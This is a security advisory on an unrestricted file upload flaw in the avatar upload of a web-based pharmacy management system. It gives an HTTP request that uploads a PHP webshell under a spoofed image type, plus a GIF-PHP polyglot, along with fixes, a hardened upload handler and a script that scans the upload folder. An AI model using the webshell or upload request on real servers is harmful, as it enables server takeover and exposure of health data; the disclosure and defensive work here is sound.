# Submission #553722: Sourcecodester Web-based Pharmacy Product Management System v1.0 Unrestricted Upload
## Critical Security Advisory: Unrestricted File Upload Vulnerability in Pharmacy Management System

### Vulnerability Summary

- **Title:** Unrestricted File Upload Leading to Remote Code Execution (RCE)
- **Affected Version:** Web-based Pharmacy Product Management System (≤ v1.0)
- **Risk Level:** **Critical (CVSS: 9.8)**
- **Discovered By:** yaklang.io, IRify, Yakit

---

### Vulnerability Details

#### Root Cause

The `edit-photo.php` file fails to properly validate file uploads, relying only on **client-controllable MIME type checks** (`$_FILES['avatar']['type']`). An attacker can bypass this check and upload malicious files (e.g., `.php`, `.html`, `.js`) to the `uploadImage/` directory, leading to **Remote Code Execution (RCE)** or **Cross-Site Scripting (XSS)**.

#### Key Issues

1. **No File Extension Validation**
   - Only the MIME type (`image/jpeg`, `image/png`, etc.) is checked, and it can be spoofed by the client.
   - No validation of file content (e.g., `getimagesize()` should be mandatory).
2. **Predictable File Storage**
   - Uploaded files retain their original names (`move_uploaded_file(..., $_FILES["avatar"]["name"])`).
   - No randomization or secure storage mechanism.
3. **Lack of Server-Side Protections**
   - No `.htaccess`/`web.config` restrictions to prevent script execution in `uploadImage/`.
   - No file size limits, allowing **Denial-of-Service (DoS)** via large uploads.

---

### Impact

- **Remote Code Execution (RCE)**
  - Upload a PHP webshell (`<?php system($_GET['cmd']); ?>`) → full server takeover.
- **Cross-Site Scripting (XSS)**
  - Upload malicious `.html`/`.js` files → session hijacking, phishing.
- **Data Breach & Compliance Violations**
  - Exposes **PHI (Protected Health Information)** → **HIPAA violations**.

---

### Proof of Concept (PoC)

#### 1. Bypassing MIME Check

The `Content-Type: image/jpeg` part header is the spoofed MIME type; the file name and body are PHP.

```http
POST /edit-photo.php HTTP/1.1
Host: target.com
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxyz

------WebKitFormBoundaryxyz
Content-Disposition: form-data; name="avatar"; filename="shell.php"
Content-Type: image/jpeg

<?php system($_GET['cmd']); ?>
------WebKitFormBoundaryxyz--
```

- **Result:** `shell.php` is uploaded to `uploadImage/` and executable via `http://target.com/uploadImage/shell.php?cmd=id`.

#### 2. GIF + PHP Polyglot Attack

```php
GIF89a;
<?php system($_GET['cmd']); ?>
```

- Bypasses `getimagesize()` checks while still executing as PHP.

---

### Mitigation & Fixes

#### 1. Strict File Validation

```php
$allowed_ext = ['jpg', 'jpeg', 'png', 'gif', 'webp'];
$file_ext = strtolower(pathinfo($_FILES['avatar']['name'], PATHINFO_EXTENSION));
if (!in_array($file_ext, $allowed_ext) || !@getimagesize($_FILES['avatar']['tmp_name'])) {
    die("Invalid file type or corrupted image.");
}
```

#### 2. Secure File Storage

- **Randomize filenames:**

  ```php
  $new_name = bin2hex(random_bytes(16)) . '.' . $file_ext;
  move_uploaded_file($_FILES["avatar"]["tmp_name"], "uploadImage/" . $new_name);
  ```

- **Prevent script execution:** add a `.htaccess` in `uploadImage/`:

  ```apache
  php_flag engine off
  RemoveHandler .php .phtml .phar
  ```

#### 3. Server Hardening

- **Set file size limits** (`upload_max_filesize` in `php.ini`).
- **Disable dangerous PHP functions** (`system`, `exec`, `shell_exec`).
- **Log all upload attempts** for auditing.

---

### Compliance Implications

- **HIPAA Violation:** Unauthorized PHI access via RCE.
- **PCI DSS Non-Compliance:** Lack of file upload controls (Req. 6.5.1).
- **GDPR Breach:** Potential PII exposure.

---

### Recommendations

1. **Immediate Action:**
   - Disable file uploads until patched.
   - Scan `uploadImage/` for malicious files.
2. **Long-Term Fixes:**
   - Migrate to a secure file storage service (AWS S3, Azure Blob).
   - Conduct a **full security audit** of the application.

---

**References:**

- OWASP Unrestricted File Upload (A05:2021)
- CWE-434: Unrestricted Upload of Dangerous File Types
- NIST SP 800-123: Secure File Upload Guidelines
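The mitigation steps above (extension allow-list, `getimagesize()`, random file names, size limit) combined into one upload handler, as an added example that is not the project's code or the reporter's. It assumes PHP 8.0 or later with the GD and `fileinfo` extensions; the `avatar` field name and the `uploadImage/` directory are the application's own, while the 2 MiB size cap, the 4096 px dimension cap and the `storeAvatar()` helper name are chosen for the example. It goes beyond the snippets in the report in two ways: the MIME type is sniffed from the file bytes rather than read from `$_FILES['avatar']['type']`, and the image is re-encoded with GD, which is what actually defeats the GIF89a polyglot from PoC 2 (the trailing PHP is not pixel data, so it is not written back out).

```php
<?php
// Added example (not the project's code): a hardened replacement for the avatar
// upload step in edit-photo.php. Assumes PHP >= 8.0 with the GD and fileinfo
// extensions; the field name "avatar" and the uploadImage/ directory are the
// application's own, the size and dimension caps are chosen here.
declare(strict_types=1);

const MAX_AVATAR_BYTES = 2 * 1024 * 1024;            // 2 MiB, chosen for this example
const MAX_DIMENSION    = 4096;                       // pixels, chosen for this example
const UPLOAD_DIR       = __DIR__ . '/uploadImage';   // the application's existing directory

// Content-sniffed MIME type => the one extension we will ever write to disk.
const ALLOWED_TYPES = [
    'image/jpeg' => 'jpg',
    'image/png'  => 'png',
    'image/gif'  => 'gif',
    'image/webp' => 'webp',
];

/**
 * Validate and store one uploaded avatar.
 * Returns [true, newFileName] on success or [false, reason] on rejection.
 */
function storeAvatar(array $file): array
{
    // 1. PHP's own upload status and a hard size cap (the original had none).
    $err = $file['error'] ?? UPLOAD_ERR_NO_FILE;
    if ($err !== UPLOAD_ERR_OK) {
        return [false, "Upload failed (PHP error code $err)"];
    }
    $tmp = $file['tmp_name'] ?? '';
    if (($file['size'] ?? 0) > MAX_AVATAR_BYTES || !is_uploaded_file($tmp)) {
        return [false, 'File too large or not an uploaded file'];
    }

    // 2. $_FILES['avatar']['type'] is client-controlled; sniff the bytes instead.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($tmp);
    if ($mime === false || !isset(ALLOWED_TYPES[$mime])) {
        return [false, 'Unsupported image type'];
    }
    $ext = ALLOWED_TYPES[$mime];

    // 3. The client-supplied extension must agree with the sniffed content
    //    (rejects shell.php sent with a spoofed image/jpeg Content-Type).
    $clientExt = strtolower(pathinfo($file['name'] ?? '', PATHINFO_EXTENSION));
    if (($clientExt === 'jpeg' ? 'jpg' : $clientExt) !== $ext) {
        return [false, 'File extension does not match content'];
    }

    // 4. Must decode as an image with sane dimensions (also bounds decompression).
    $info = @getimagesize($tmp);
    if ($info === false || $info[0] > MAX_DIMENSION || $info[1] > MAX_DIMENSION) {
        return [false, 'Invalid or oversized image'];
    }

    // 5. Re-encode from the decoded pixels. A GIF89a header followed by PHP
    //    passes getimagesize(), but the PHP text is not part of the pixel data,
    //    so it does not survive this step. (EXIF and GIF animation are dropped
    //    too, which is acceptable for an avatar.)
    $img = @imagecreatefromstring((string) file_get_contents($tmp));
    if ($img === false) {
        return [false, 'Image could not be decoded'];
    }

    // 6. Server-chosen random name; the client's file name never reaches the disk.
    $newName = bin2hex(random_bytes(16)) . '.' . $ext;
    $dest    = UPLOAD_DIR . '/' . $newName;
    $written = match ($ext) {
        'jpg'  => imagejpeg($img, $dest, 90),
        'png'  => imagepng($img, $dest),
        'gif'  => imagegif($img, $dest),
        'webp' => imagewebp($img, $dest),
    };
    if (!$written) {
        return [false, 'Could not write image'];
    }
    chmod($dest, 0644);   // readable by the web server, never executable
    return [true, $newName];
}

// Usage in edit-photo.php, after the existing session/authorization checks:
// [$ok, $result] = storeAvatar($_FILES['avatar'] ?? []);
// if (!$ok) { http_response_code(400); exit(htmlspecialchars($result)); }
// // ... persist $result (the new file name) for the user record ...
```

This handler is still meant to sit behind the `.htaccess` from Mitigation 2: validation stops bad files from being written, the handler rules stop anything that does land in `uploadImage/` from being executed, and the two controls fail independently.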
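For the "Scan `uploadImage/` for malicious files" step under Immediate Action, an audit script as an added example that is not part of the report. It assumes PHP 8.0 or later with the `fileinfo` extension and defaults to the application's `uploadImage/` directory; the `auditUploadDir()` name and the extension lists are chosen for the example. Each flagged file is reported with its modification time so the findings can be lined up against web-server logs for `/edit-photo.php` during incident response.

```php
<?php
// Added example (not the project's code): audit the upload directory for files
// that are not genuine images. Assumes PHP >= 8.0 with the fileinfo extension;
// the directory defaults to the application's uploadImage/.
declare(strict_types=1);

const IMAGE_EXTENSIONS  = ['jpg', 'jpeg', 'png', 'gif', 'webp'];
const IMAGE_MIME_TYPES  = ['image/jpeg', 'image/png', 'image/gif', 'image/webp'];
const SCRIPT_EXTENSIONS = ['php', 'php3', 'php5', 'php7', 'phtml', 'phar', 'html', 'htm', 'js', 'svg'];

/**
 * Walk $dir and return [path => ['mtime' => ..., 'size' => ..., 'reasons' => [...]]]
 * for every file that deserves a closer look.
 */
function auditUploadDir(string $dir): array
{
    $finfo    = new finfo(FILEINFO_MIME_TYPE);
    $findings = [];
    $iterator = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator($dir, FilesystemIterator::SKIP_DOTS)
    );

    foreach ($iterator as $path => $entry) {
        if (!$entry->isFile()) {
            continue;
        }
        $reasons = [];
        $name    = strtolower($entry->getFilename());
        $ext     = strtolower($entry->getExtension());

        // a) A script-capable extension anywhere in the name catches shell.php
        //    as well as double-extension names such as shell.php.jpg.
        foreach (array_slice(explode('.', $name), 1) as $segment) {
            if (in_array($segment, SCRIPT_EXTENSIONS, true)) {
                $reasons[] = "script extension '.$segment' in file name";
                break;
            }
        }
        // b) Anything not on the image allow-list, including a planted .htaccess.
        if (!in_array($ext, IMAGE_EXTENSIONS, true)) {
            $reasons[] = "extension '.$ext' is not an image extension";
        }
        // c) Content sniffing: the bytes must look like an image regardless of the name.
        $mime = $finfo->file($path);
        if (!in_array($mime, IMAGE_MIME_TYPES, true)) {
            $reasons[] = 'content sniffed as ' . ($mime === false ? 'unknown' : $mime);
        }
        // d) Polyglot check: a valid image header with PHP or HTML tags after it.
        //    Deliberately narrow patterns, so random bytes in a real JPEG do not
        //    produce false positives.
        $bytes = file_get_contents($path);
        if ($bytes !== false && preg_match('/<\?php\b|<script\b/i', $bytes)) {
            $reasons[] = 'contains a PHP or <script> tag';
        }

        if ($reasons) {
            $findings[$path] = [
                'mtime'   => date('c', $entry->getMTime()),   // for the incident timeline
                'size'    => $entry->getSize(),
                'reasons' => $reasons,
            ];
        }
    }
    ksort($findings);
    return $findings;
}

if (PHP_SAPI === 'cli') {
    $dir      = $argv[1] ?? __DIR__ . '/uploadImage';
    $findings = auditUploadDir($dir);
    foreach ($findings as $path => $f) {
        printf("%s  (modified %s, %d bytes)\n", $path, $f['mtime'], $f['size']);
        foreach ($f['reasons'] as $r) {
            echo "    - $r\n";
        }
    }
    fwrite(STDERR, count($findings) . " suspicious file(s) under $dir\n");
}
```

Run it as `php audit-uploads.php /path/to/uploadImage` on a copy of the directory taken before any clean-up, so the modification times are preserved. A file that trips only check (d) while sniffing as a valid image is exactly the GIF89a polyglot case from PoC 2 and should be treated as a confirmed upload of attacker content, not a false positive.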
- **Reference:** https://github.com/yaklang/IRifyScanResult/blob/main/Web-based%20Pharmacy%20Product%20Management%20System/upload_in_edit-photo.md
- **Reporter:** lingze (UID 83608)
- **Timeline:** 04/08/2025 17:51 → 04/17/2025 14:50 (9 days later)
- **VulDB:** entry 305399, "SourceCodester Web-based Pharmacy Product Management System 1.0 /edit-photo.php Avatar unrestricted upload"